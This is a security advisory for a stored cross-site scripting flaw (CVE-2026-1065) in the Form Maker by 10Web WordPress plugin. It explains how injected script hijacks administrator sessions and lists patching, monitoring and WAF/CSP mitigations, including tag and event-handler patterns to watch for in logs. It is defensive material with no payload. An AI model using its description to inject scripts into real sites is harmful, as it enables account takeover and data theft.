A high-severity vulnerability exists within the Form Maker by 10Web plugin for WordPress, identified as CVE-2026-1065. This flaw allows an attacker to inject malicious code into the website by submitting a specially crafted form. This can lead to the compromise of administrator or user accounts, theft of sensitive data, and potential takeover of the affected website.

The vulnerability is a Stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can inject malicious client-side script (e.g., JavaScript) into fields within a form created by the plugin. The plugin fails to properly sanitize this input before storing it in the database. When a privileged user, such as an administrator, views the submitted form data in the WordPress backend, the malicious script executes within the context of their browser session, potentially allowing the attacker to hijack their session, steal credentials, perform actions on their behalf, or redirect them to a malicious site.

This vulnerability is rated as High severity with a CVSS score of 7.2. Successful exploitation could lead to significant business impact, including the compromise of administrator accounts, which would grant an attacker full control over the WordPress site. This could result in website defacement, theft of sensitive data submitted by users through forms (personally identifiable information, etc.), loss of customer trust, and reputational damage. The compromised website could also be used as a platform to host malware or launch further attacks against visitors.

Immediate Action:

• Immediately update the "Form Maker by 10Web" plugin to the latest version provided by the vendor, which contains a patch for this vulnerability.
• If the plugin is not essential for business operations, consider deactivating and removing it entirely to eliminate the attack surface.
• Review WordPress user accounts for any unauthorized or suspicious accounts created recently.

Proactive Monitoring:

• Monitor web server and application logs for unusual POST requests to form submission endpoints, particularly those containing HTML script tags (<script>, <img>, <iframe>) or JavaScript event handlers (onerror, onload).
• Implement file integrity monitoring to detect unauthorized changes to plugin files or WordPress core files.
• Review form submission data for any stored entries that appear to contain malicious code.

Compensating Controls:

• If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with rulesets configured to detect and block common XSS attack payloads.
• Implement a strong Content Security Policy (CSP) to restrict the sources from which scripts can be executed, thereby mitigating the impact of an XSS injection.
• Restrict access to the WordPress administrative dashboard (/wp-admin/) to trusted IP addresses only.

Public Exploit Available: False

Given the high severity (CVSS 7.2) of this vulnerability and its presence in a popular form-building plugin, we strongly recommend immediate remediation. Organizations using the affected "Form Maker by 10Web" plugin should prioritize applying the vendor-supplied security update without delay. Although there is no evidence of active exploitation in the wild, the risk of compromise is significant, and proactive patching is the most effective defense.